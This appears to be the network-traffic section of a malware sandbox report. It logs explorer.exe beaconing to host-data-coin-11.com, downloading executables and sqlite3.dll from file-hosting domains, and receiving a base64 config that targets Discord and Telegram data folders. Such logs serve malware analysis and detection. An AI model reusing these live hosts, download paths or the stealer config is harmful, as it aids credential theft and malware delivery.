                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
33 | 192.168.2.3 | 49821 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:51.548367023 CET | 7117 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://pubplnqymd.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 368
Host: host-data-coin-11.com
Dec 1, 2021 10:04:51.650799990 CET | 7118 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
34 | 192.168.2.3 | 49822 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:51.870958090 CET | 7119 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xwkfccuhh.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 126
Host: host-data-coin-11.com
Dec 1, 2021 10:04:51.972790003 CET | 7119 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
35 | 192.168.2.3 | 49823 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:52.724018097 CET | 7121 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vndygv.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 292
Host: host-data-coin-11.com
Dec 1, 2021 10:04:52.821063995 CET | 7122 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:52 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
36 | 192.168.2.3 | 49824 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:53.195681095 CET | 7123 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wyjxomh.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 113
Host: host-data-coin-11.com
Dec 1, 2021 10:04:53.298787117 CET | 7123 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:53 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
37 | 192.168.2.3 | 49825 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:53.405021906 CET | 7124 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mdthdprqu.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 212
Host: host-data-coin-11.com
Dec 1, 2021 10:04:53.504515886 CET | 7125 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:53 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 4a ed ac 8e 70 bc 57 da 4a d6 f7 22 81 20 ea c3 96 53 28 ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 46I:82OU&1UPJ%9JpWJ" S(c0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
38 | 192.168.2.3 | 49826 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:53.624286890 CET | 7125 | OUT | GET /files/4152_1638095425_4339.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: host-file-host-3.com
Dec 1, 2021 10:04:53.709692955 CET | 7127 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:53 GMT
Content-Type: application/x-msdos-program
Content-Length: 2740224
Connection: close
Last-Modified: Sun, 28 Nov 2021 10:30:25 GMT
ETag: "29d000-5d1d6cff91027"
Accept-Ranges: bytes
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$LCyCyCyWzHyW|yW}QyW~By}RyzVy|iyWxPyCxypDyBy{ByRichCyPELw7a@RFP@ n*@ > ` PP@@ $0@ P@@ "`@B.idata@.rsrc@@.themidaA`.boot'PF'``w/C1k\-UNsu


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
39 | 192.168.2.3 | 49827 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:59.901526928 CET | 11319 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qpiidyh.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 242
Host: host-data-coin-11.com
Dec 1, 2021 10:05:00.006170988 CET | 11320 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:59 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49752 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:26.942143917 CET | 1101 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://llalic.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 268
Host: host-data-coin-11.com
Dec 1, 2021 10:04:27.042258024 CET | 1101 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
40 | 192.168.2.3 | 49828 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:05:00.123142004 CET | 11321 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mgjqknucl.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 178
Host: host-data-coin-11.com
Dec 1, 2021 10:05:00.225522995 CET | 11322 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:05:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
41 | 192.168.2.3 | 49829 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:05:00.318556070 CET | 11322 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ehiesag.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 268
Host: host-data-coin-11.com
Dec 1, 2021 10:05:00.420095921 CET | 11323 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:05:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
42 | 192.168.2.3 | 49830 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:05:00.514219999 CET | 11324 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eyepuy.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 293
Host: host-data-coin-11.com
Dec 1, 2021 10:05:00.617242098 CET | 11325 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:05:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
43 | 192.168.2.3 | 49831 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:05:00.536287069 CET | 11325 | OUT | GET /tratata.php HTTP/1.1
Host: file-file-host4.com
Connection: Keep-Alive
Dec 1, 2021 10:05:00.631361961 CET | 11326 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Wed, 01 Dec 2021 09:05:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=sc69tg8a29f4pr0nv46ehfqbko; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
                                                                                                                                                                                Data Ascii: c4MXwxfDF8MXxEaXNjb3JkfDB8JUFQUERBVEElXGRpc2NvcmRcTG9jYWwgU3RvcmFnZVx8KnwxfDB8MHxUZWxlZ3JhbXwwfCVBUFBEQVRBJVxUZWxlZ3JhbSBEZXNrdG9wXHRkYXRhXHwqRDg3N0Y3ODNENUQzRUY4QyosKm1hcCosKmNvbmZpZ3MqfDF8MHwwfA==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
44 | 192.168.2.3 | 49832 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:05:00.707607031 CET | 11327 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://lqyvwperx.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 268
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:05:00.807302952 CET | 11424 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:00 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
45 | 192.168.2.3 | 49833 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:05:00.805763006 CET | 11423 | OUT | GET /sqlite3.dll HTTP/1.1
                                                                                                                                                                                Host: file-file-host4.com
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Cookie: PHPSESSID=sc69tg8a29f4pr0nv46ehfqbko
Dec 1, 2021 10:05:00.890485048 CET | 11425 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.2
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:00 GMT
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Content-Length: 645592
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Last-Modified: Thu, 21 Oct 2021 11:48:30 GMT
                                                                                                                                                                                ETag: "9d9d8-5cedb79317f80"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=Sv?!X` 8 L'p.text`0`.data@@.rdata$@@@.bss@.edata@0@.idataL@0.CRT@0.tls @0.reloc'(@0B/4`0@@B/19@@B/35MP@B/51`C`D@B/638@B/77F@B/89R@0B/102X@B/113


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
46 | 192.168.2.3 | 49834 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:05:01.203716993 CET | 11830 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://omcxl.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 293
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:05:01.307280064 CET | 12064 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:01 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
47 | 192.168.2.3 | 49835 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:05:01.447958946 CET | 12101 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://vhude.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 130
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:05:01.547652006 CET | 12102 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:01 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef a8 8d 70 bc 57 da 4a d5 fe 24 85 21 ed c3 95 53 2f e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 46I:82OU&1UPJ%9KpWJ$!S/c0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
48 | 192.168.2.3 | 49836 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:05:01.644479036 CET | 12102 | OUT | GET /files/5311_1638303032_7343.exe HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: host-file-host-3.com
Dec 1, 2021 10:05:01.730918884 CET | 12104 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:01 GMT
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Content-Length: 1143000
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Last-Modified: Tue, 30 Nov 2021 20:10:32 GMT
                                                                                                                                                                                ETag: "1170d8-5d2072645dc9e"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELpi0`~ @ 5@P~Kh H.text^ ` `.rsrcb@.relocf@B~H_w}B(~S(*0*B(~S(**B(~S(***0*0*0*B(~S(****0*B(~S(**0*0*0*0*B(~S(*0*0*B(~S(*0*0*0**B(~S(*0*0*0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
49 | 192.168.2.3 | 49837 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:05:06.595227957 CET | 14469 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://rxjdalrcm.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 230
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:05:06.695252895 CET | 14470 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:06 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49753 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:27.436376095 CET | 1102 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://higvbe.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 283
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:04:27.537578106 CET | 1103 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:27 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
50 | 192.168.2.3 | 49838 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:05:06.794899940 CET | 14471 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://wxhnpjysno.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 113
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:05:06.893867970 CET | 14472 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:06 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
51 | 192.168.2.3 | 49839 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:05:07.005564928 CET | 14473 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://tiketfrip.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 130
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:05:07.107167006 CET | 14473 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:07 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
52 | 192.168.2.3 | 49840 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:05:07.208173037 CET | 14474 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://srvivkc.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 194
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:05:07.309169054 CET | 14475 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:07 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
53 | 192.168.2.3 | 49841 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:05:07.416822910 CET | 14476 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://jjguoq.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 261
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:05:07.525152922 CET | 14477 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:07 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
54 | 192.168.2.3 | 49842 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:05:07.620755911 CET | 14477 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://ysemel.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 207
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:05:07.726607084 CET | 14478 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:07 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
55 | 192.168.2.3 | 49843 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:05:07.850172997 CET | 14479 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://dagsykb.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 133
                                                                                                                                                                                Host: host-data-coin-11.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
56 | 192.168.2.3 | 49844 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
57 | 192.168.2.3 | 49845 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
58 | 192.168.2.3 | 49846 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
59 | 192.168.2.3 | 49847 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.3 | 49754 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:27.936999083 CET | 1104 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://nvrwtjsdku.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 276
                                                                                                                                                                                Host: host-data-coin-11.com
